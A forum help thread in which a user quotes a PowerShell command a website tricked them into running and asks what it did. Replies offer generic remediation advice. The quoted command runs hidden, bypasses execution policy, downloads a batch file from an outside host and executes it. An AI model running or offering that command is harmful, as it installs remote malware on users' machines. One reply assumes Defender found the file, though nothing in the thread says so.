I need some help! I was tricked by a website into running a command in the Run prompt, and now I'm worried about the potential damage it could have caused. The command I accidentally executed was:
powershell -w Hidden -ep Bypass -c "iwr [eng730.github.io/e/654] -OutFile $env:TEMP\P.bat; cmd /c $env:TEMP\P.bat". Can anyone explain what this command does, what kind of harm it might inflict, and how I can undo any effects it may have had?
4 Answers
It's a good call to be cautious! If the command ran with a hidden parameter, there's a chance some scripts ran in the background. Keep monitoring your system and run a complete antivirus scan. You might want to check your browser for any unusual activity, too.
Haha, I once ran a random script on my iPhone, and it wanted money from me! Just be careful—these things can snowball into bigger issues.
First off, you might want to look at resetting your passwords and setting up multi-factor authentication everywhere. I know it’s frustrating, but formatting your computer could also help if you think it’s that infected. Backup your files first, of course!
Running that command likely downloaded and executed a batch file straight from the web, which could contain harmful instructions. Make sure to check for any suspicious files in your system and scan with your antivirus software since it seems like Windows Defender already found the .bat file.
I did check, but can you confirm if the PowerShell script might have any hidden files left behind? I'm not sure if it could have done anything else, like grabbing my credentials.
Yeah, I realize how silly it was now. The website was clearly trying to trick me, and I just wanted to see what was going on. I didn’t mean to run the command!